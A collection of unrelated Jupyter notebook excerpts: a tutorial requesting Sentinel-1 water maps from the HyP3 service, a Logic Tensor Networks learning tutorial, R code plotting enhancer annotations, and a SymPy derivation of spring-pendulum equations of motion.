You can use the example WKT, or copy and paste your AOI's WKT, in the text area that will appear below the next cell.
```
wkt = wkt_input()
```
Water maps currently require the Sentinel-1 source granules to be SLCs (preferred) or High-Res GRDs,
acquired using the IW beam mode, with both VV and VH polarizations. The next cell performs a search over your AOI,
with these parameters set.
*Note: You will likely want to edit the `start` and `end` parameters.*
```
import asf_search
from asf_search.constants import SENTINEL1, SLC, IW, VV_VH
search_results = asf_search.geo_search(
platform=[SENTINEL1],
processingLevel=[SLC],
beamMode=[IW],
polarization=[VV_VH],
intersectsWith=wkt.value,
start='2021-05-30',
end='2021-06-08',
)
all_granules = {result.properties['sceneName'] for result in search_results}
display(sorted(all_granules))
```
## 2. Request water maps from HyP3-watermap
### 2.1 Connect to the HyP3-watermap deployment
Use the HyP3 SDK to connect to the custom deployment with your [NASA Earthdata login](https://urs.earthdata.nasa.gov/).
```
import hyp3_sdk
hyp3_watermap = hyp3_sdk.HyP3('https://hyp3-watermap.asf.alaska.edu', prompt=True)
```
### 2.2 Specify the custom water map parameters
Below is a dictionary representation of the possible customization options for a water-map job.
Importantly, this definition will be applied to each granule in our search results, so these
options will be used with each job we submit.
You may change any or all of them, and in particular, you will likely want to use the
`name` parameter to group each "batch" of jobs together and easily find them later.
```
job_definition = {
'name': 'water-map-example',
'job_type': 'WATER_MAP',
'job_parameters': {
'resolution': 30,
'speckle_filter': True,
'max_vv_threshold': -15.5,
'max_vh_threshold': -23.0,
'hand_threshold': 15.0,
'hand_fraction': 0.8,
'membership_threshold': 0.45,
}
}
```
### 2.3 Submit the jobs to the custom HyP3-watermap deployment
Using the job definition as defined above (make sure you run the cell!), this will submit a job for
each granule in the search results.
```
import copy
prepared_jobs = []
for granule in all_granules:
job = copy.deepcopy(job_definition)
job['job_parameters']['granules'] = [granule]
prepared_jobs.append(job)
jobs = hyp3_watermap.submit_prepared_jobs(prepared_jobs)
```
Once the jobs are submitted, you can watch for them to complete (it will take ~30 min for all jobs to finish).
```
jobs = hyp3_watermap.watch(jobs)
```
Or, you can come back later and find your jobs by name, and make sure they're finished
```
jobs = hyp3_watermap.find_jobs(name='water-map-example')
jobs = hyp3_watermap.watch(jobs)
```
Once all jobs are complete, you can download the products for each successful job
```
jobs.download_files('data/')
```
## Notes on viewing/evaluating the water map products
* All GeoTIFFs in the RTC products are Cloud-Optimized, including the water map files `*_WM.tif`, and will have overviews/pyramids.
**This means the `*_WM.tif`'s appear to have a significantly higher water extent than they do in reality until you zoom in.**
|
github_jupyter
|
import ipywidgets as widgets
from IPython.display import display
def wkt_input():
wkt = widgets.Textarea(
placeholder='WKT of search area',
value='POLYGON((-91.185 36.6763,-86.825 36.6763,-86.825 38.9176,-91.185 38.9176,-91.185 36.6763))',
layout=widgets.Layout(width='100%'),
)
display(wkt)
return wkt
def file_ids_input():
file_ids = widgets.Textarea(
placeholder='copy-paste Sentinel-1 granule names or file ids here (One granule or id per line)',
layout=widgets.Layout(width='100%', height='12em'),
)
display(file_ids)
return file_ids
file_ids = file_ids_input()
all_granules = [f.strip().split('-')[0] for f in file_ids.value.splitlines()]
display(sorted(all_granules))
wkt = wkt_input()
import asf_search
from asf_search.constants import SENTINEL1, SLC, IW, VV_VH
search_results = asf_search.geo_search(
platform=[SENTINEL1],
processingLevel=[SLC],
beamMode=[IW],
polarization=[VV_VH],
intersectsWith=wkt.value,
start='2021-05-30',
end='2021-06-08',
)
all_granules = {result.properties['sceneName'] for result in search_results}
display(sorted(all_granules))
import hyp3_sdk
hyp3_watermap = hyp3_sdk.HyP3('https://hyp3-watermap.asf.alaska.edu', prompt=True)
job_definition = {
'name': 'water-map-example',
'job_type': 'WATER_MAP',
'job_parameters': {
'resolution': 30,
'speckle_filter': True,
'max_vv_threshold': -15.5,
'max_vh_threshold': -23.0,
'hand_threshold': 15.0,
'hand_fraction': 0.8,
'membership_threshold': 0.45,
}
}
import copy
prepared_jobs = []
for granule in all_granules:
job = copy.deepcopy(job_definition)
job['job_parameters']['granules'] = [granule]
prepared_jobs.append(job)
jobs = hyp3_watermap.submit_prepared_jobs(prepared_jobs)
jobs = hyp3_watermap.watch(jobs)
jobs = hyp3_watermap.find_jobs(name='water-map-example')
jobs = hyp3_watermap.watch(jobs)
jobs.download_files('data/')
| 0.373762 | 0.974288 |
# Learning in LTN
This tutorial explains how to learn some language symbols (predicates, functions, constants) using the satisfaction of a knowledgebase as an objective. It expects basic familiarity of the first two turoials on LTN (grounding symbols and connectives).
```
import logictensornetworks as ltn
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
```
We use the following simple example to illustrate learning in LTN.
The domain is the square $[0,4] \times [0,4]$. We have one example of the class $A$ and one example of the class $B$. The rest of the individuals are not labelled, but there are two assumptions:
- $A$ and $B$ are mutually exclusive,
- any two close points should share the same label.
```
points = np.array(
[[0.4,0.3],[1.2,0.3],[2.2,1.3],[1.7,1.0],[0.5,0.5],[0.3, 1.5],[1.3, 1.1],[0.9, 1.7],
[3.4,3.3],[3.2,3.3],[3.2,2.3],[2.7,2.0],[3.5,3.5],[3.3, 2.5],[3.3, 1.1],[1.9, 3.7],[1.3, 3.5],[3.3, 1.1],[3.9, 3.7]])
point_a = [3.3,2.5]
point_b = [1.3,1.1]
fig, ax = plt.subplots()
ax.set_xlim(0,4)
ax.set_ylim(0,4)
ax.scatter(points[:,0],points[:,1],color="black",label="unknown")
ax.scatter(point_a[0],point_a[1],color="blue",label="a")
ax.scatter(point_b[0],point_b[1],color="red",label="b")
ax.set_title("Dataset of individuals")
plt.legend();
```
We define the membership predicate $C(x,l)$, where $x$ is an individual and $l$ is a onehot label to denote the two classes. $C$ is approximated by a simple MLP. The last layer, that computes probabilities per class, uses a `softmax` activation, ensuring that the classes are mutually-exclusive.
We define the knowledgebase $\mathcal{K}$ composed of the following rules:
\begin{align}
& C(a,l_a)\\
& C(b,l_b)\\
\forall x_1,x_2,l\ \big(\mathrm{Sim}(x_1,x_2) & \rightarrow \big(C(x_1,l)\leftrightarrow C(x_2,l)\big)\big)
\end{align}
where $a$ and $b$ the two individuals already classified; $x_1$,$x_2$ are variables ranging over all individuals; $l_a$, $l_b$ are the one-hot labels for $A$ and $B$; $l$ is a variable ranging over the labels. $\mathrm{Sim}$ is a predicate measuring similarity between two points. $\mathcal{G}(\mathrm{Sim}):\vec{u},\vec{v}\mapsto \exp(-\|\vec{u}-\vec{v} \|^2)$.
The objective is to learn the predicate $C$ to maximize the satisfaction of $\mathcal{K}$. If $\theta$ denotes the set of trainable parameters, the task is :
$$
\theta^\ast = \mathrm{argmax}_{\theta\in\Theta}\ \mathrm{SatAgg}_{\phi\in\mathcal{K}}\mathcal{G}_{\theta}(\phi)
$$
where $\mathrm{SatAgg}$ is an operator that aggregates the truth values of the formulas in $\mathcal{K}$ (if there are more than one formula).
To evaluate the grounding of each formula, one has to define the grounding of the non-logical symbols and of the operators.
```
class ModelC(tf.keras.Model):
def __init__(self):
super(ModelC, self).__init__()
self.dense1 = tf.keras.layers.Dense(5, activation=tf.nn.elu)
self.dense2 = tf.keras.layers.Dense(5, activation=tf.nn.elu)
self.dense3 = tf.keras.layers.Dense(2, activation=tf.nn.softmax)
def call(self, inputs):
"""inputs[0]: point, inputs[1]: onehot label"""
x, label = inputs[0], inputs[1]
x = self.dense1(x)
x = self.dense2(x)
prob = self.dense3(x)
return tf.math.reduce_sum(prob*label,axis=1)
C = ltn.Predicate(ModelC())
x1 = ltn.variable("x1",points)
x2 = ltn.variable("x2",points)
a = ltn.constant([3.3,2.5])
b = ltn.constant([1.3,1.1])
l_a = ltn.constant([1,0])
l_b = ltn.constant([0,1])
l = ltn.variable("l",[[1,0],[0,1]])
Sim = ltn.Predicate.Lambda(
lambda args: tf.exp(-1.*tf.sqrt(tf.reduce_sum(tf.square(args[0]-args[1]),axis=1)))
)
similarities_to_a = Sim([x1,a])
fig, ax = plt.subplots()
ax.set_xlim(0,4)
ax.set_ylim(0,4)
ax.scatter(points[:,0],points[:,1],color="black")
ax.scatter(a[0],a[1],color="blue")
ax.set_title("Illustrating the similarities of each point to a")
for i, sim_to_a in enumerate(similarities_to_a):
plt.plot([points[i,0],a[0]],[points[i,1],a[1]], alpha=sim_to_a.numpy(),color="blue")
```
Notice the operator for equivalence $p \leftrightarrow q$; in LTN, it is simply implemented as $(p \rightarrow q)\land(p \leftarrow q)$ using one operator for conjunction and one operator for implication.
```
Not = ltn.Wrapper_Connective(ltn.fuzzy_ops.Not_Std())
And = ltn.Wrapper_Connective(ltn.fuzzy_ops.And_Prod())
Or = ltn.Wrapper_Connective(ltn.fuzzy_ops.Or_ProbSum())
Implies = ltn.Wrapper_Connective(ltn.fuzzy_ops.Implies_Reichenbach())
Equiv = ltn.Wrapper_Connective(ltn.fuzzy_ops.Equiv(ltn.fuzzy_ops.And_Prod(),ltn.fuzzy_ops.Implies_Reichenbach()))
Forall = ltn.Wrapper_Quantifier(ltn.fuzzy_ops.Aggreg_pMeanError(p=2),semantics="forall")
Exists = ltn.Wrapper_Quantifier(ltn.fuzzy_ops.Aggreg_pMean(p=6),semantics="exists")
```
If there are several closed formulas in $\mathcal{K}$, their truth values need to be aggregated.
We recommend to use the generalized mean inspired operator `pMeanError`, already used to implement $\forall$.
The hyperparameter again allows flexibility in how strict the formula aggregation is ($p = 1$ corresponds to `mean`; $p \to +\inf$ corresponds to `min`).
The knowledgebase should be written inside of a function that is decorated with `tf.function`. This Tensorflow decorator compiles the function into a callable TensorFlow graph (static).
```
formula_aggregator = ltn.fuzzy_ops.Aggreg_pMeanError(p=2)
@tf.function
def axioms():
axioms = [
C([a,l_a]),
C([b,l_b]),
Forall(
[x1,x2,l],
Implies( Sim([x1,x2]),
Equiv(C([x1,l]),C([x2,l]))
)
)
]
kb_sat = formula_aggregator(tf.stack(axioms))
return kb_sat
```
**It is important to always run (forward pass) the knowledgebase once before training, as Tensorflow initializes weights and compiles the graph during the first call.**
```
axioms()
```
Eventually, one can write a custom training loop in Tensorflow.
```
trainable_variables = C.trainable_variables
optimizer = tf.keras.optimizers.Adam(learning_rate=0.001)
for epoch in range(2000):
with tf.GradientTape() as tape:
loss = 1. - axioms()
grads = tape.gradient(loss, trainable_variables)
optimizer.apply_gradients(zip(grads, trainable_variables))
if epoch%200 == 0:
print("Epoch %d: Sat Level %.3f"%(epoch, axioms()))
print("Training finished at Epoch %d with Sat Level %.3f"%(epoch, axioms()))
```
After a few epochs, the system has learned to identify samples close to the point $a$ (resp. $b$) as belonging to class $A$ (resp. $B$) based on the rules of the knowledgebase.
```
fig = plt.figure(figsize=(10,3))
fig.add_subplot(1,2,1)
plt.scatter(x1[:,0],x1[:,1],c=C([x1,l_a]).numpy(),vmin=0,vmax=1)
plt.title("C(x,l_a)")
plt.colorbar()
fig.add_subplot(1,2,2)
plt.scatter(x1[:,0],x1[:,1],c=C([x1,l_b]).numpy(),vmin=0,vmax=1)
plt.title("C(x,l_b)")
plt.colorbar()
plt.show();
```
## Special Cases
### Variables grounded by batch
When working with batches of data, grounding the variables with different values at each step:
1. Pass the values in arguments to the knowledgebase function,
2. Create the ltn variables within the function.
```python
@tf.function
def axioms(data_x, data_y):
x = ltn.variable("x", data_x)
y = ltn.variable("y", data_y)
return Forall([x,y],P([x,y]))
...
for epoch in range(epochs):
for batch_x, batch_y in dataset:
with tf.GradientTape() as tape:
loss_value = 1. - axioms(batch_x, batch_y)
grads = tape.gradient(loss_value, trainable_variables)
optimizer.apply_gradients(zip(grads, trainable_variables))
```
### Variables denoting a sequence of trainable constants
When a variable denotes a sequence of trainable constants (embeddings):
1. Do not create the variable outside the scope of `tf.GradientTape()`,
2. Create the variable within the training step function.
```python
c1 = ltn.constant([2.1,3], trainable=True)
c2 = ltn.constant([4.5,0.8], trainable=True)
# Do not assign the variable here. Tensorflow would not keep track of the
# gradients between c1/c2 and x during training.
# x = ltn.variable("x", tf.stack([c1,c2]))
...
@tf.function
def axioms():
# The assignation must be done within the tf.GradientTape,
# inside of the training step function.
x = ltn.variable("x",tf.stack([c1,c2]))
return Forall(x,P(x))
...
for epoch in range(epochs):
with tf.GradientTape() as tape:
loss_value = 1. - axioms()
grads = tape.gradient(loss_value, trainable_variables)
optimizer.apply_gradients(zip(grads, trainable_variables))
```
|
github_jupyter
|
import logictensornetworks as ltn
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
points = np.array(
[[0.4,0.3],[1.2,0.3],[2.2,1.3],[1.7,1.0],[0.5,0.5],[0.3, 1.5],[1.3, 1.1],[0.9, 1.7],
[3.4,3.3],[3.2,3.3],[3.2,2.3],[2.7,2.0],[3.5,3.5],[3.3, 2.5],[3.3, 1.1],[1.9, 3.7],[1.3, 3.5],[3.3, 1.1],[3.9, 3.7]])
point_a = [3.3,2.5]
point_b = [1.3,1.1]
fig, ax = plt.subplots()
ax.set_xlim(0,4)
ax.set_ylim(0,4)
ax.scatter(points[:,0],points[:,1],color="black",label="unknown")
ax.scatter(point_a[0],point_a[1],color="blue",label="a")
ax.scatter(point_b[0],point_b[1],color="red",label="b")
ax.set_title("Dataset of individuals")
plt.legend();
class ModelC(tf.keras.Model):
def __init__(self):
super(ModelC, self).__init__()
self.dense1 = tf.keras.layers.Dense(5, activation=tf.nn.elu)
self.dense2 = tf.keras.layers.Dense(5, activation=tf.nn.elu)
self.dense3 = tf.keras.layers.Dense(2, activation=tf.nn.softmax)
def call(self, inputs):
"""inputs[0]: point, inputs[1]: onehot label"""
x, label = inputs[0], inputs[1]
x = self.dense1(x)
x = self.dense2(x)
prob = self.dense3(x)
return tf.math.reduce_sum(prob*label,axis=1)
C = ltn.Predicate(ModelC())
x1 = ltn.variable("x1",points)
x2 = ltn.variable("x2",points)
a = ltn.constant([3.3,2.5])
b = ltn.constant([1.3,1.1])
l_a = ltn.constant([1,0])
l_b = ltn.constant([0,1])
l = ltn.variable("l",[[1,0],[0,1]])
Sim = ltn.Predicate.Lambda(
lambda args: tf.exp(-1.*tf.sqrt(tf.reduce_sum(tf.square(args[0]-args[1]),axis=1)))
)
similarities_to_a = Sim([x1,a])
fig, ax = plt.subplots()
ax.set_xlim(0,4)
ax.set_ylim(0,4)
ax.scatter(points[:,0],points[:,1],color="black")
ax.scatter(a[0],a[1],color="blue")
ax.set_title("Illustrating the similarities of each point to a")
for i, sim_to_a in enumerate(similarities_to_a):
plt.plot([points[i,0],a[0]],[points[i,1],a[1]], alpha=sim_to_a.numpy(),color="blue")
Not = ltn.Wrapper_Connective(ltn.fuzzy_ops.Not_Std())
And = ltn.Wrapper_Connective(ltn.fuzzy_ops.And_Prod())
Or = ltn.Wrapper_Connective(ltn.fuzzy_ops.Or_ProbSum())
Implies = ltn.Wrapper_Connective(ltn.fuzzy_ops.Implies_Reichenbach())
Equiv = ltn.Wrapper_Connective(ltn.fuzzy_ops.Equiv(ltn.fuzzy_ops.And_Prod(),ltn.fuzzy_ops.Implies_Reichenbach()))
Forall = ltn.Wrapper_Quantifier(ltn.fuzzy_ops.Aggreg_pMeanError(p=2),semantics="forall")
Exists = ltn.Wrapper_Quantifier(ltn.fuzzy_ops.Aggreg_pMean(p=6),semantics="exists")
formula_aggregator = ltn.fuzzy_ops.Aggreg_pMeanError(p=2)
@tf.function
def axioms():
axioms = [
C([a,l_a]),
C([b,l_b]),
Forall(
[x1,x2,l],
Implies( Sim([x1,x2]),
Equiv(C([x1,l]),C([x2,l]))
)
)
]
kb_sat = formula_aggregator(tf.stack(axioms))
return kb_sat
axioms()
trainable_variables = C.trainable_variables
optimizer = tf.keras.optimizers.Adam(learning_rate=0.001)
for epoch in range(2000):
with tf.GradientTape() as tape:
loss = 1. - axioms()
grads = tape.gradient(loss, trainable_variables)
optimizer.apply_gradients(zip(grads, trainable_variables))
if epoch%200 == 0:
print("Epoch %d: Sat Level %.3f"%(epoch, axioms()))
print("Training finished at Epoch %d with Sat Level %.3f"%(epoch, axioms()))
fig = plt.figure(figsize=(10,3))
fig.add_subplot(1,2,1)
plt.scatter(x1[:,0],x1[:,1],c=C([x1,l_a]).numpy(),vmin=0,vmax=1)
plt.title("C(x,l_a)")
plt.colorbar()
fig.add_subplot(1,2,2)
plt.scatter(x1[:,0],x1[:,1],c=C([x1,l_b]).numpy(),vmin=0,vmax=1)
plt.title("C(x,l_b)")
plt.colorbar()
plt.show();
@tf.function
def axioms(data_x, data_y):
x = ltn.variable("x", data_x)
y = ltn.variable("y", data_y)
return Forall([x,y],P([x,y]))
...
for epoch in range(epochs):
for batch_x, batch_y in dataset:
with tf.GradientTape() as tape:
loss_value = 1. - axioms(batch_x, batch_y)
grads = tape.gradient(loss_value, trainable_variables)
optimizer.apply_gradients(zip(grads, trainable_variables))
c1 = ltn.constant([2.1,3], trainable=True)
c2 = ltn.constant([4.5,0.8], trainable=True)
# Do not assign the variable here. Tensorflow would not keep track of the
# gradients between c1/c2 and x during training.
# x = ltn.variable("x", tf.stack([c1,c2]))
...
@tf.function
def axioms():
# The assignation must be done within the tf.GradientTape,
# inside of the training step function.
x = ltn.variable("x",tf.stack([c1,c2]))
return Forall(x,P(x))
...
for epoch in range(epochs):
with tf.GradientTape() as tape:
loss_value = 1. - axioms()
grads = tape.gradient(loss_value, trainable_variables)
optimizer.apply_gradients(zip(grads, trainable_variables))
| 0.653459 | 0.980319 |
```
enhancer_annotation_FACS = read.csv("~/Desktop/Divya/Thesis/enhancers/enhancer_annotation_FACS.csv")
FACS_prop = read.csv("~/Desktop/Divya/Thesis/enhancers/FACS_prop.csv")
head(FACS_prop)
df = data.frame(x1prop = c(FACS_prop$X1.prop, subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$X1.prop,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$X1.prop,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$X1.prop))
type = c(rep("All", length(FACS_prop$X1.prop)), rep("Both", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$X1.prop)),
rep("H3K27ac", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$X1.prop)),
rep("H3K4me1", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$X1.prop))
)
df$type = type
library(ggpubr)
options(repr.plot.width = 9, repr.plot.height = 7)
my_comparisons = list( c("chip", "k27ac"), c("k27ac", "k4me1"), c("chip", "k4me1"))
p = ggplot(df, aes(x=type, y=x1prop, fill=type)) +geom_jitter(size=0.3, alpha=0.3) + geom_violin(alpha=0.5)
p = p + theme_minimal()
p = p + scale_fill_manual(name=" ", labels=c("Combined", "Single H3K27ac", "Single H3K4me1", "All"), values=c("orange", "lightblue", "navyblue", "grey"))
p = p + theme(plot.title = element_text(hjust = 0.5), title=element_text(size=30), axis.text.y=element_text(size=30), axis.text.x=element_text(size=25), axis.title=element_text(size=30), legend.title=element_text(size=30), legend.text=element_text(size=25), legend.position="top")
p = p + xlab("\nX1 proportional expression")+ylab("Frequency\n")
p = p + guides(fill=guide_legend(nrow=2,byrow=TRUE))
#p = p + theme(plot.title = element_text(hjust = 0.5), title=element_text(size=30), axis.text.y=element_text(size=30), axis.text.x=element_text(size=25), axis.title=element_text(size=35), legend.position="none", legend.title=element_text(), legend.text=element_text(size=25))
#p = p + scale_fill_manual(name=" ", values=c("navyblue", "#2B83BA", "orange"))
#p = p + scale_x_discrete(labels=c("Combined", "Single H3K27ac", "Single H3K4me1"))
#p = p + xlab("") + ylab("log2 fold change lpt(RNAi)\nH3K4me1\n")+stat_compare_means(comparisons = my_comparisons, size=8)
#p = p + scale_y_continuous(trans="log10")+stat_compare_means(label.y = 6.2, label.x=2.2, size=10)+stat_compare_means(comparisons = my_comparisons, size=8)
p = p + geom_hline(yintercept=0.33, linetype="dashed", size=1.25)
p
df = data.frame(x1prop = c(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$distanceToTSS,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$distanceToTSS,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$distanceToTSS))
type = c(rep("Both", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$distanceToTSS)),
rep("H3K27ac", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$distanceToTSS)),
rep("H3K4me1", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$distanceToTSS))
)
df$type = type
library(ggplot2)
options(repr.plot.width = 9, repr.plot.height = 7)
p = ggplot(df, aes(x=abs(x1prop), fill=type))+geom_histogram(bins=40)
p = p + scale_fill_manual(name=" ", labels=c("Both", "H3K27ac", "H3K4me1"), values=c("#00AFBB", "#E7B800", "#FC4E07"))
p = p + theme(plot.title = element_text(hjust = 0.5),
title=element_text(size=16),
axis.text.y=element_text(size=16),
axis.text.x=element_text(size=16),
axis.title=element_text(size=16),
legend.title=element_text(size=20),
legend.text=element_text(size=20),
legend.position = "top",
axis.title.x = element_text(size = 22),
axis.title.y = element_text(size = 22),
plot.margin = margin(0, 0, 0, 1, "cm"))
plt1 = p + xlab("\nDistance to TSS (bp)")+ylab("Frequency\n")+xlim(0,50000)
#p = p + geom_vline(xintercept=10, col="black", size=1.2, linetype="dashed")
ggsave("en.pdf", plt1)
plt1
fs = 16
library(ggpubr)
options(repr.plot.width = 9, repr.plot.height = 7)
plt2=ggviolin(df, x = "type", y = "x1prop",
fill="type", palette = c("#00AFBB", "#E7B800", "#FC4E07"),
width=0.9,
xlab="", ylab="Frequency\n",
legend.title = "",
legend = "top",
font.main = fs,
font.submain = fs,
font.caption = fs,
font.legend = 20,
font.y = 22,
font.label = list(size = fs, color = "black"))
plt2 = plt2 + theme(axis.text.x = element_text(size=fs), axis.text.y = element_text(size=fs)) + ylim(0, 60000)
ggsave("violin.pdf", plt2)
plt2
```
|
github_jupyter
|
enhancer_annotation_FACS = read.csv("~/Desktop/Divya/Thesis/enhancers/enhancer_annotation_FACS.csv")
FACS_prop = read.csv("~/Desktop/Divya/Thesis/enhancers/FACS_prop.csv")
head(FACS_prop)
df = data.frame(x1prop = c(FACS_prop$X1.prop, subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$X1.prop,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$X1.prop,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$X1.prop))
type = c(rep("All", length(FACS_prop$X1.prop)), rep("Both", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$X1.prop)),
rep("H3K27ac", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$X1.prop)),
rep("H3K4me1", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$X1.prop))
)
df$type = type
library(ggpubr)
options(repr.plot.width = 9, repr.plot.height = 7)
my_comparisons = list( c("chip", "k27ac"), c("k27ac", "k4me1"), c("chip", "k4me1"))
p = ggplot(df, aes(x=type, y=x1prop, fill=type)) +geom_jitter(size=0.3, alpha=0.3) + geom_violin(alpha=0.5)
p = p + theme_minimal()
p = p + scale_fill_manual(name=" ", labels=c("Combined", "Single H3K27ac", "Single H3K4me1", "All"), values=c("orange", "lightblue", "navyblue", "grey"))
p = p + theme(plot.title = element_text(hjust = 0.5), title=element_text(size=30), axis.text.y=element_text(size=30), axis.text.x=element_text(size=25), axis.title=element_text(size=30), legend.title=element_text(size=30), legend.text=element_text(size=25), legend.position="top")
p = p + xlab("\nX1 proportional expression")+ylab("Frequency\n")
p = p + guides(fill=guide_legend(nrow=2,byrow=TRUE))
#p = p + theme(plot.title = element_text(hjust = 0.5), title=element_text(size=30), axis.text.y=element_text(size=30), axis.text.x=element_text(size=25), axis.title=element_text(size=35), legend.position="none", legend.title=element_text(), legend.text=element_text(size=25))
#p = p + scale_fill_manual(name=" ", values=c("navyblue", "#2B83BA", "orange"))
#p = p + scale_x_discrete(labels=c("Combined", "Single H3K27ac", "Single H3K4me1"))
#p = p + xlab("") + ylab("log2 fold change lpt(RNAi)\nH3K4me1\n")+stat_compare_means(comparisons = my_comparisons, size=8)
#p = p + scale_y_continuous(trans="log10")+stat_compare_means(label.y = 6.2, label.x=2.2, size=10)+stat_compare_means(comparisons = my_comparisons, size=8)
p = p + geom_hline(yintercept=0.33, linetype="dashed", size=1.25)
p
df = data.frame(x1prop = c(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$distanceToTSS,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$distanceToTSS,
subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$distanceToTSS))
type = c(rep("Both", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "chip")$distanceToTSS)),
rep("H3K27ac", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k27ac")$distanceToTSS)),
rep("H3K4me1", length(subset(enhancer_annotation_FACS, enhancer_annotation_FACS$Type == "k4me1")$distanceToTSS))
)
df$type = type
library(ggplot2)
options(repr.plot.width = 9, repr.plot.height = 7)
p = ggplot(df, aes(x=abs(x1prop), fill=type))+geom_histogram(bins=40)
p = p + scale_fill_manual(name=" ", labels=c("Both", "H3K27ac", "H3K4me1"), values=c("#00AFBB", "#E7B800", "#FC4E07"))
p = p + theme(plot.title = element_text(hjust = 0.5),
title=element_text(size=16),
axis.text.y=element_text(size=16),
axis.text.x=element_text(size=16),
axis.title=element_text(size=16),
legend.title=element_text(size=20),
legend.text=element_text(size=20),
legend.position = "top",
axis.title.x = element_text(size = 22),
axis.title.y = element_text(size = 22),
plot.margin = margin(0, 0, 0, 1, "cm"))
plt1 = p + xlab("\nDistance to TSS (bp)")+ylab("Frequency\n")+xlim(0,50000)
#p = p + geom_vline(xintercept=10, col="black", size=1.2, linetype="dashed")
ggsave("en.pdf", plt1)
plt1
fs = 16
library(ggpubr)
options(repr.plot.width = 9, repr.plot.height = 7)
plt2=ggviolin(df, x = "type", y = "x1prop",
fill="type", palette = c("#00AFBB", "#E7B800", "#FC4E07"),
width=0.9,
xlab="", ylab="Frequency\n",
legend.title = "",
legend = "top",
font.main = fs,
font.submain = fs,
font.caption = fs,
font.legend = 20,
font.y = 22,
font.label = list(size = fs, color = "black"))
plt2 = plt2 + theme(axis.text.x = element_text(size=fs), axis.text.y = element_text(size=fs)) + ylim(0, 60000)
ggsave("violin.pdf", plt2)
plt2
| 0.400046 | 0.323647 |
```
import sympy as sp
from sympy.physics.mechanics import dynamicsymbols
m0, m1, l0, l1, k0, k1, t, g = sp.symbols(r'm_0 m_1 l_0 l_1 k_0 k_1 t g')
theta0 = sp.Function(r'\theta_0')(t)
theta1 = sp.Function(r'\theta_1')(t)
r0 = sp.Function(r'r_0')(t)
r1 = sp.Function(r'r_1')(t)
dtheta0 = theta0.diff(t)
dtheta1 = theta1.diff(t)
dr0 = r0.diff(t)
dr1 = r1.diff(t)
I0 = m0 * r0 ** 2 / 12
I1 = m1 * r1 ** 2 / 12
x0 = (r0 / 2) * sp.sin(theta0)
y0 = -(r0 / 2) * sp.cos(theta0)
x1 = r0 * sp.sin(theta0) + (r1 / 2) * sp.sin(theta1)
y1 = -r0 * sp.cos(theta0) - (r1 / 2) * sp.cos(theta1)
spring_potential = k0 * (r0 - l0) ** 2 / 2 + k1 * (r1 - l1) ** 2 / 2
gravitational_potential = (m0 * y0 + m1 * y1) * g
kinetic = m0 * (x0.diff(t) ** 2 + y0.diff(t) ** 2) / 2 + m1 * (x1.diff(t) ** 2 + y1.diff(t) ** 2) / 2 + (I0 / 2) * theta0.diff(t) ** 2 + (I1 / 2) * theta1.diff(t) ** 2
L = kinetic - (spring_potential + gravitational_potential)
EL_r0 = sp.Eq(L.diff( dr0).diff(t),L.diff( r0)).simplify()
EL_r1 = sp.Eq(L.diff( dr1).diff(t),L.diff( r1)).simplify()
EL_theta0 = sp.Eq(L.diff(dtheta0).diff(t),L.diff(theta0)).simplify()
EL_theta1 = sp.Eq(L.diff(dtheta1).diff(t),L.diff(theta1)).simplify()
soln = sp.solve(
[EL_r0, EL_r1, EL_theta0, EL_theta1],
[r0.diff(t, 2), r1.diff(t, 2), theta0.diff(t, 2), theta1.diff(t, 2)]
)
keys = list(soln.keys())
soln_list = [sp.Eq(key,soln[key]) for key in keys]
ddr0 = soln_list[0].simplify()
ddr1 = soln_list[1].simplify()
ddtheta0 = soln_list[2].simplify()
ddtheta1 = soln_list[3].simplify()
subs_dict = {
r0.diff(t ):sp.Function( r'\dot{r}_0')(t),
r1.diff(t ):sp.Function( r'\dot{r}_1')(t),
theta0.diff(t ):sp.Function( r'\dot{\theta}_0')(t),
theta1.diff(t ):sp.Function( r'\dot{\theta}_1')(t),
r0.diff(t, 2):sp.Function( r'\ddot{r}_0')(t),
r1.diff(t, 2):sp.Function( r'\ddot{r}_1')(t),
theta0.diff(t, 2):sp.Function(r'\ddot{\theta}_0')(t),
theta1.diff(t, 2):sp.Function(r'\ddot{\theta}_1')(t)
}
def convert(_):
return str(_.subs(subs_dict).rhs).replace('(t)','').replace('\\left','').replace('\\right','').replace('\\theta','theta').replace('\\dot{theta}','dtheta').replace('\\dot{r}','dr').replace('_','').replace(' - ','-').replace(' + ','+')
convert(ddr0)
convert(ddr1)
convert(ddtheta0)
convert(ddtheta1)
```
```js
